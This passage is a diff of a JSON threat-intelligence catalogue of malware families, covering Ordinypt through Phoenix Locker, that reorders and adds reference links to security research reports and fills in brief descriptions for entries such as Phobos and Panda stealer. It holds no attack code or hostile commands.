"https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat"
],
"synonyms": [
@@ -34858,15 +36701,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "1d46f816-d159-4457-b98e-c34307d90655",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "7fd96553-4c78-43de-824f-82645ed4fac5",
"value": "Ordinypt"
},
@@ -34888,15 +36722,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.oski",
- "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
- "https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer",
- "https://3xp0rt.com/posts/mars-stealer",
- "https://medium.com/shallvhack/oski-stealer-a-credential-theft-malware-b9bba5164601",
- "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
"https://cyberint.com/blog/research/mars-stealer/",
- "https://twitter.com/albertzsigovits/status/1160874557454131200",
+ "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
+ "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
+ "https://medium.com/shallvhack/oski-stealer-a-credential-theft-malware-b9bba5164601",
+ "https://3xp0rt.com/posts/mars-stealer",
+ "https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/",
"https://drive.google.com/file/d/1c72YIF6JYcEvbFZCrkZO26D9hC3gnyMP/view",
- "https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/"
+ "https://twitter.com/albertzsigovits/status/1160874557454131200",
+ "https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer",
+ "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468"
],
"synonyms": [],
"type": []
@@ -34953,8 +36788,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://twitter.com/VK_Intel/status/1085820673811992576"
],
"synonyms": [
@@ -35026,10 +36861,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy",
- "https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20",
+ "https://lab52.io/blog/chimera-apt-updates-on-its-owlproxy-malware/",
"https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf",
"https://securelist.com/the-sessionmanager-iis-backdoor/106868/",
- "https://lab52.io/blog/chimera-apt-updates-on-its-owlproxy-malware/"
+ "https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20"
],
"synonyms": [],
"type": []
@@ -35050,6 +36885,19 @@
"uuid": "aa985bc5-92e4-43c6-a01b-1de02818cfc9",
"value": "Owowa"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oxtarat",
+ "https://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a5b379c0-7934-4a50-9a34-7ad1524b1fb0",
+ "value": "OxtaRAT"
+ },
{
"description": "",
"meta": {
@@ -35082,8 +36930,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt",
- "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/",
- "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/"
+ "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/",
+ "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/"
],
"synonyms": [],
"type": []
@@ -35096,8 +36944,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin",
- "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html",
- "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf"
+ "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf",
+ "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html"
],
"synonyms": [],
"type": []
@@ -35110,24 +36958,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker",
- "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://medium.com/@crovax/panda-banker-analysis-part-1-d08b3a855847",
- "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers",
- "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/",
"http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html",
- "https://www.spamhaus.org/news/article/771/",
- "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html",
"https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/",
- "https://www.youtube.com/watch?v=J7VOfAJvxEY",
- "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
"https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf",
- "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html",
+ "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/",
+ "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/",
"https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html"
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.youtube.com/watch?v=J7VOfAJvxEY",
+ "https://www.spamhaus.org/news/article/771/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers",
+ "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker",
+ "https://medium.com/@crovax/panda-banker-analysis-part-1-d08b3a855847",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html",
+ "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media"
],
"synonyms": [
"ZeusPanda"
@@ -35138,7 +36986,7 @@
"value": "PandaBanker"
},
{
- "description": "",
+ "description": "According to PCrisk, Panda is the name of a malicious program, which is classified as a stealer. It is a new variant of CollectorStealer.\r\n\r\nThe aim of this malware is to extract and exfiltrate sensitive and personal information from infected devices. Panda primarily targets data relating to cryptocurrency wallets.\r\n\r\nThis piece of malicious software has been observed being actively distributed via spam campaigns - large-scale operations during which thousands of scam emails are sent. The spam mail proliferating Panda stealer heavily targeted users from the United States, Germany, Japan, and Australia.\r\n\r\nThe deceptive email letters concerned business-related topics (e.g., fake product quote requests, etc.). Panda stealer is a dangerous program, and as such - its infections must be removed immediately upon detection.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.panda_stealer",
@@ -35156,28 +37004,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora",
- "https://cloudsek.com/technical-analysis-of-emerging-sophisticated-pandora-ransomware-group/",
"https://www.fortinet.com/blog/threat-research/Using-emulation-against-anti-reverse-engineering-techniques",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.fortinet.com/blog/threat-research/looking-inside-pandoras-box",
"https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://kienmanowar.wordpress.com/2022/03/21/quicknote-analysis-of-pandora-ransomware/",
"https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/",
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://kienmanowar.wordpress.com/2022/03/21/quicknote-analysis-of-pandora-ransomware/",
+ "https://www.fortinet.com/blog/threat-research/looking-inside-pandoras-box",
+ "https://cloudsek.com/technical-analysis-of-emerging-sophisticated-pandora-ransomware-group/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
"https://dissectingmalwa.re/blog/pandora/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "2c215062-5739-4859-bd82-9639ae1d1756",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e43b67bc-3c16-4a69-b63d-f6bf3d732e1b",
"value": "Pandora"
},
@@ -35187,8 +37026,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora_rat",
"https://github.com/AZMagic/Pandora-Hvnc-Hidden-Browser-Real-Vnc-Working-Chromium-Edge-Opera-Gx",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware"
+ "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya"
],
"synonyms": [
"Pandora hVNC RAT"
@@ -35203,7 +37042,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.paradies_clipper",
- "https://www.youtube.com/watch?v=wjoH9jW2EPQ"
+ "https://www.youtube.com/watch?v=wjoH9jW2EPQ",
+ "https://perception-point.io/blog/behind-the-attack-paradies-clipper-malware/"
],
"synonyms": [],
"type": []
@@ -35216,12 +37056,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.paradise",
- "https://therecord.media/source-code-for-paradise-ransomware-leaked-on-hacking-forums/",
+ "https://marcoramilli.com/2021/08/23/paradise-ransomware-the-builder/",
"https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://asec.ahnlab.com/en/47590/",
"https://www.lastline.com/labsblog/iqy-files-and-paradise-ransomware/",
- "https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again",
+ "https://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html",
+ "https://therecord.media/source-code-for-paradise-ransomware-leaked-on-hacking-forums/",
"https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool",
- "https://marcoramilli.com/2021/08/23/paradise-ransomware-the-builder/"
+ "https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again"
],
"synonyms": [],
"type": []
@@ -35234,12 +37076,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax",
- "https://blog.morphisec.com/parallax-rat-active-status",
- "https://www.vkremez.com/2020/02/lets-learn-inside-parallax-rat-malware.html",
"https://twitter.com/malwrhunterteam/status/1227196799997431809",
- "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
"https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
+ "https://blog.morphisec.com/parallax-rat-active-status",
"https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/",
+ "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
+ "https://www.vkremez.com/2020/02/lets-learn-inside-parallax-rat-malware.html",
+ "https://www.uptycs.com/blog/cryptocurrency-entities-at-risk-threat-actor-uses-parallax-rat-for-infiltration",
"https://www.bleepingcomputer.com/news/security/parallax-rat-common-malware-payload-after-hacker-forums-promotion/"
],
"synonyms": [
@@ -35268,30 +37111,34 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.partyticket",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
- "https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
- "https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/",
"https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/",
- "https://www.mandiant.com/resources/information-operations-surrounding-ukraine",
- "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
- "https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/",
- "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
- "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-hermeticransom-victims-in-ukraine/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://www.techtarget.com/searchsecurity/news/252514091/CrowdStrike-cracks-PartyTicket-ransomware-targeting-Ukraine",
"https://www.zscaler.com/blogs/security-research/technical-analysis-partyticket-ransomware",
- "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/",
+ "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/",
+ "https://securelist.com/new-ransomware-trends-in-2022/106457/",
+ "https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/",
+ "https://www.brighttalk.com/webcast/15591/534324",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf",
"https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html",
- "https://www.brighttalk.com/webcast/15591/534324"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/",
+ "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.mandiant.com/resources/information-operations-surrounding-ukraine",
+ "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-hermeticransom-victims-in-ukraine/",
+ "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/",
+ "https://www.techtarget.com/searchsecurity/news/252514091/CrowdStrike-cracks-PartyTicket-ransomware-targeting-Ukraine",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf"
],
"synonyms": [
"Elections GoRansom",
@@ -35321,12 +37168,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://twitter.com/TrendMicroRSRCH/status/1389422784808378370",
"https://research.checkpoint.com/2020/ransomware-alert-pay2key/",
+ "https://twitter.com/TrendMicroRSRCH/status/1389422784808378370",
+ "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
"https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf"
],
"synonyms": [
@@ -35355,8 +37202,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pcshare",
- "https://web.archive.org/web/20191115210757/https://threatvector.cylance.com/en_us/home/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware.html",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
+ "https://web.archive.org/web/20191115210757/https://threatvector.cylance.com/en_us/home/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware.html"
],
"synonyms": [],
"type": []
@@ -35369,14 +37216,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash",
- "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf",
- "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf",
- "https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1",
- "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
"https://www.us-cert.gov/ncas/analysis-reports/ar20-133c",
- "https://asec.ahnlab.com/en/30022/",
"https://blog.reversinglabs.com/blog/hidden-cobra",
- "https://asec.ahnlab.com/en/30532/"
+ "https://asec.ahnlab.com/en/30022/",
+ "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf",
+ "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf",
+ "https://asec.ahnlab.com/en/30532/",
+ "https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1",
+ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/"
],
"synonyms": [],
"type": []
@@ -35470,14 +37317,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.petya",
- "https://www.microsoft.com/security/blog/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/",
- "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/",
"https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
"https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
- "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/",
"https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/",
- "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html"
+ "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/",
+ "https://www.microsoft.com/security/blog/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/",
+ "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/"
],
"synonyms": [],
"type": []
@@ -35518,12 +37366,12 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom",
"https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html",
+ "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/",
+ "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://intel471.com/blog/a-brief-history-of-ta505",
- "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/",
- "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/"
+ "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf"
],
"synonyms": [],
"type": []
@@ -35532,32 +37380,33 @@
"value": "Philadephia Ransom"
},
{
- "description": "Ransomware.",
+ "description": "MalwareBytes states that Phobos is one of the ransomware families that are distributed via hacked Remote Desktop (RDP) connections. This isn't surprising, as hacked RDP servers are a cheap commodity on the underground market, and can make for an attractive and cost efficient dissemination vector for threat groups.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://paraflare.com/luci-spools-the-fun-with-phobos-ransomware/",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/",
- "https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware",
"https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware",
- "https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground",
"https://blogs.blackberry.com/en/2021/11/zebra2104",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://paraflare.com/luci-spools-the-fun-with-phobos-ransomware/",
"https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/",
- "https://securelist.com/cis-ransomware/104452/"
+ "https://securelist.com/cis-ransomware/104452/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew",
+ "https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://cert.pl/en/posts/2023/02/breaking-phobos/"
],
"synonyms": [],
"type": []
@@ -35570,10 +37419,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_keylogger",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
"https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger",
- "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
- "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/"
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/",
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass"
],
"synonyms": [],
"type": []
@@ -35587,10 +37436,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_locker",
"https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
"https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
